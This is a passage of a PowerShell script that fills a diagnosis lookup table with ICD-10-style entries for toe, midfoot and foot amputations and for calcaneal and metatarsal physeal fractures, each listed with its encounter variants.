$DiagnosisList.Rows.Add("Partial traumatic amputation of one right lesser toe","Partial traumatic amputation of one right lesser toe, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of one left lesser toe","Partial traumatic amputation of one left lesser toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of one left lesser toe","Partial traumatic amputation of one left lesser toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of one left lesser toe","Partial traumatic amputation of one left lesser toe, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of one unspecified lesser toe","Partial traumatic amputation of one unspecified lesser toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of one unspecified lesser toe","Partial traumatic amputation of one unspecified lesser toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of one unspecified lesser toe","Partial traumatic amputation of one unspecified lesser toe, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of two or more right lesser toes","Complete traumatic amputation of two or more right lesser toes, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of two or more right lesser toes","Complete traumatic amputation of two or more right lesser toes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of two or more right lesser toes","Complete traumatic amputation of two or more right lesser toes, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of two or more left lesser toes","Complete traumatic amputation of two or more left lesser toes, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of two or more left lesser toes","Complete traumatic amputation of two or more left lesser toes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of two or more left lesser toes","Complete traumatic amputation of two or more left lesser toes, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of two or more unspecified lesser toes","Complete traumatic amputation of two or more unspecified lesser toes, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of two or more unspecified lesser toes","Complete traumatic amputation of two or more unspecified lesser toes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of two or more unspecified lesser toes","Complete traumatic amputation of two or more unspecified lesser toes, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of two or more right lesser toes","Partial traumatic amputation of two or more right lesser toes, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of two or more right lesser toes","Partial traumatic amputation of two or more right lesser toes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of two or more right lesser toes","Partial traumatic amputation of two or more right lesser toes, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of two or more left lesser toes","Partial traumatic amputation of two or more left lesser toes, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of two or more left lesser toes","Partial traumatic amputation of two or more left lesser toes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of two or more left lesser toes","Partial traumatic amputation of two or more left lesser toes, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of two or more unspecified lesser toes","Partial traumatic amputation of two or more unspecified lesser toes, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of two or more unspecified lesser toes","Partial traumatic amputation of two or more unspecified lesser toes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of two or more unspecified lesser toes","Partial traumatic amputation of two or more unspecified lesser toes, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right midfoot","Complete traumatic amputation of right midfoot, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right midfoot","Complete traumatic amputation of right midfoot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right midfoot","Complete traumatic amputation of right midfoot, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left midfoot","Complete traumatic amputation of left midfoot, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left midfoot","Complete traumatic amputation of left midfoot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left midfoot","Complete traumatic amputation of left midfoot, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified midfoot","Complete traumatic amputation of unspecified midfoot, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified midfoot","Complete traumatic amputation of unspecified midfoot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified midfoot","Complete traumatic amputation of unspecified midfoot, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right midfoot","Partial traumatic amputation of right midfoot, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right midfoot","Partial traumatic amputation of right midfoot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right midfoot","Partial traumatic amputation of right midfoot, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left midfoot","Partial traumatic amputation of left midfoot, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left midfoot","Partial traumatic amputation of left midfoot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left midfoot","Partial traumatic amputation of left midfoot, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified midfoot","Partial traumatic amputation of unspecified midfoot, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified midfoot","Partial traumatic amputation of unspecified midfoot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified midfoot","Partial traumatic amputation of unspecified midfoot, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right foot, level unspecified","Complete traumatic amputation of right foot, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right foot, level unspecified","Complete traumatic amputation of right foot, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right foot, level unspecified","Complete traumatic amputation of right foot, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left foot, level unspecified","Complete traumatic amputation of left foot, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left foot, level unspecified","Complete traumatic amputation of left foot, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left foot, level unspecified","Complete traumatic amputation of left foot, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified foot, level unspecified","Complete traumatic amputation of unspecified foot, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified foot, level unspecified","Complete traumatic amputation of unspecified foot, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified foot, level unspecified","Complete traumatic amputation of unspecified foot, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right foot, level unspecified","Partial traumatic amputation of right foot, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right foot, level unspecified","Partial traumatic amputation of right foot, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right foot, level unspecified","Partial traumatic amputation of right foot, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left foot, level unspecified","Partial traumatic amputation of left foot, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left foot, level unspecified","Partial traumatic amputation of left foot, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left foot, level unspecified","Partial traumatic amputation of left foot, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified foot, level unspecified","Partial traumatic amputation of unspecified foot, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified foot, level unspecified","Partial traumatic amputation of unspecified foot, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified foot, level unspecified","Partial traumatic amputation of unspecified foot, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of right calcaneus","Unspecified physeal fracture of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of right calcaneus","Unspecified physeal fracture of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of right calcaneus","Unspecified physeal fracture of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of right calcaneus","Unspecified physeal fracture of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of right calcaneus","Unspecified physeal fracture of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of right calcaneus","Unspecified physeal fracture of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of right calcaneus","Unspecified physeal fracture of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of left calcaneus","Unspecified physeal fracture of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of left calcaneus","Unspecified physeal fracture of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of left calcaneus","Unspecified physeal fracture of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of left calcaneus","Unspecified physeal fracture of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of left calcaneus","Unspecified physeal fracture of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of left calcaneus","Unspecified physeal fracture of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of left calcaneus","Unspecified physeal fracture of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of unspecified calcaneus","Unspecified physeal fracture of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of unspecified calcaneus","Unspecified physeal fracture of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of unspecified calcaneus","Unspecified physeal fracture of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of unspecified calcaneus","Unspecified physeal fracture of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of unspecified calcaneus","Unspecified physeal fracture of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of unspecified calcaneus","Unspecified physeal fracture of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of unspecified calcaneus","Unspecified physeal fracture of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of right calcaneus","Salter-Harris Type I physeal fracture of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of right calcaneus","Salter-Harris Type I physeal fracture of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of right calcaneus","Salter-Harris Type I physeal fracture of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of right calcaneus","Salter-Harris Type I physeal fracture of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of right calcaneus","Salter-Harris Type I physeal fracture of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of right calcaneus","Salter-Harris Type I physeal fracture of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of right calcaneus","Salter-Harris Type I physeal fracture of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of left calcaneus","Salter-Harris Type I physeal fracture of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of left calcaneus","Salter-Harris Type I physeal fracture of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of left calcaneus","Salter-Harris Type I physeal fracture of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of left calcaneus","Salter-Harris Type I physeal fracture of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of left calcaneus","Salter-Harris Type I physeal fracture of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of left calcaneus","Salter-Harris Type I physeal fracture of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of left calcaneus","Salter-Harris Type I physeal fracture of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of unspecified calcaneus","Salter-Harris Type I physeal fracture of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of unspecified calcaneus","Salter-Harris Type I physeal fracture of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of unspecified calcaneus","Salter-Harris Type I physeal fracture of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of unspecified calcaneus","Salter-Harris Type I physeal fracture of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of unspecified calcaneus","Salter-Harris Type I physeal fracture of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of unspecified calcaneus","Salter-Harris Type I physeal fracture of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of unspecified calcaneus","Salter-Harris Type I physeal fracture of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of right calcaneus","Salter-Harris Type II physeal fracture of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of right calcaneus","Salter-Harris Type II physeal fracture of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of right calcaneus","Salter-Harris Type II physeal fracture of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of right calcaneus","Salter-Harris Type II physeal fracture of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of right calcaneus","Salter-Harris Type II physeal fracture of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of right calcaneus","Salter-Harris Type II physeal fracture of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of right calcaneus","Salter-Harris Type II physeal fracture of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of left calcaneus","Salter-Harris Type II physeal fracture of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of left calcaneus","Salter-Harris Type II physeal fracture of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of left calcaneus","Salter-Harris Type II physeal fracture of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of left calcaneus","Salter-Harris Type II physeal fracture of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of left calcaneus","Salter-Harris Type II physeal fracture of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of left calcaneus","Salter-Harris Type II physeal fracture of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of left calcaneus","Salter-Harris Type II physeal fracture of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of unspecified calcaneus","Salter-Harris Type II physeal fracture of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of unspecified calcaneus","Salter-Harris Type II physeal fracture of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of unspecified calcaneus","Salter-Harris Type II physeal fracture of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of unspecified calcaneus","Salter-Harris Type II physeal fracture of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of unspecified calcaneus","Salter-Harris Type II physeal fracture of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of unspecified calcaneus","Salter-Harris Type II physeal fracture of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of unspecified calcaneus","Salter-Harris Type II physeal fracture of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of right calcaneus","Salter-Harris Type III physeal fracture of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of right calcaneus","Salter-Harris Type III physeal fracture of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of right calcaneus","Salter-Harris Type III physeal fracture of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of right calcaneus","Salter-Harris Type III physeal fracture of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of right calcaneus","Salter-Harris Type III physeal fracture of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of right calcaneus","Salter-Harris Type III physeal fracture of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of right calcaneus","Salter-Harris Type III physeal fracture of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of left calcaneus","Salter-Harris Type III physeal fracture of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of left calcaneus","Salter-Harris Type III physeal fracture of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of left calcaneus","Salter-Harris Type III physeal fracture of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of left calcaneus","Salter-Harris Type III physeal fracture of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of left calcaneus","Salter-Harris Type III physeal fracture of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of left calcaneus","Salter-Harris Type III physeal fracture of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of left calcaneus","Salter-Harris Type III physeal fracture of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of unspecified calcaneus","Salter-Harris Type III physeal fracture of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of unspecified calcaneus","Salter-Harris Type III physeal fracture of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of unspecified calcaneus","Salter-Harris Type III physeal fracture of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of unspecified calcaneus","Salter-Harris Type III physeal fracture of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of unspecified calcaneus","Salter-Harris Type III physeal fracture of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of unspecified calcaneus","Salter-Harris Type III physeal fracture of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of unspecified calcaneus","Salter-Harris Type III physeal fracture of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of right calcaneus","Salter-Harris Type IV physeal fracture of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of right calcaneus","Salter-Harris Type IV physeal fracture of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of right calcaneus","Salter-Harris Type IV physeal fracture of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of right calcaneus","Salter-Harris Type IV physeal fracture of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of right calcaneus","Salter-Harris Type IV physeal fracture of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of right calcaneus","Salter-Harris Type IV physeal fracture of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of right calcaneus","Salter-Harris Type IV physeal fracture of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of left calcaneus","Salter-Harris Type IV physeal fracture of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of left calcaneus","Salter-Harris Type IV physeal fracture of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of left calcaneus","Salter-Harris Type IV physeal fracture of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of left calcaneus","Salter-Harris Type IV physeal fracture of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of left calcaneus","Salter-Harris Type IV physeal fracture of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of left calcaneus","Salter-Harris Type IV physeal fracture of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of left calcaneus","Salter-Harris Type IV physeal fracture of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of unspecified calcaneus","Salter-Harris Type IV physeal fracture of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of unspecified calcaneus","Salter-Harris Type IV physeal fracture of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of unspecified calcaneus","Salter-Harris Type IV physeal fracture of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of unspecified calcaneus","Salter-Harris Type IV physeal fracture of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of unspecified calcaneus","Salter-Harris Type IV physeal fracture of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of unspecified calcaneus","Salter-Harris Type IV physeal fracture of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of unspecified calcaneus","Salter-Harris Type IV physeal fracture of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of right calcaneus","Other physeal fracture of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of right calcaneus","Other physeal fracture of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of right calcaneus","Other physeal fracture of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of right calcaneus","Other physeal fracture of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of right calcaneus","Other physeal fracture of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of right calcaneus","Other physeal fracture of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of right calcaneus","Other physeal fracture of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of left calcaneus","Other physeal fracture of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of left calcaneus","Other physeal fracture of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of left calcaneus","Other physeal fracture of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of left calcaneus","Other physeal fracture of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of left calcaneus","Other physeal fracture of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of left calcaneus","Other physeal fracture of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of left calcaneus","Other physeal fracture of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of unspecified calcaneus","Other physeal fracture of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of unspecified calcaneus","Other physeal fracture of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of unspecified calcaneus","Other physeal fracture of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of unspecified calcaneus","Other physeal fracture of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of unspecified calcaneus","Other physeal fracture of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of unspecified calcaneus","Other physeal fracture of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of unspecified calcaneus","Other physeal fracture of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of right metatarsal","Unspecified physeal fracture of right metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of right metatarsal","Unspecified physeal fracture of right metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of right metatarsal","Unspecified physeal fracture of right metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of right metatarsal","Unspecified physeal fracture of right metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of right metatarsal","Unspecified physeal fracture of right metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of right metatarsal","Unspecified physeal fracture of right metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of right metatarsal","Unspecified physeal fracture of right metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of left metatarsal","Unspecified physeal fracture of left metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of left metatarsal","Unspecified physeal fracture of left metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of left metatarsal","Unspecified physeal fracture of left metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of left metatarsal","Unspecified physeal fracture of left metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of left metatarsal","Unspecified physeal fracture of left metatarsal, subsequent encounter for fracture with nonunion") + $null = 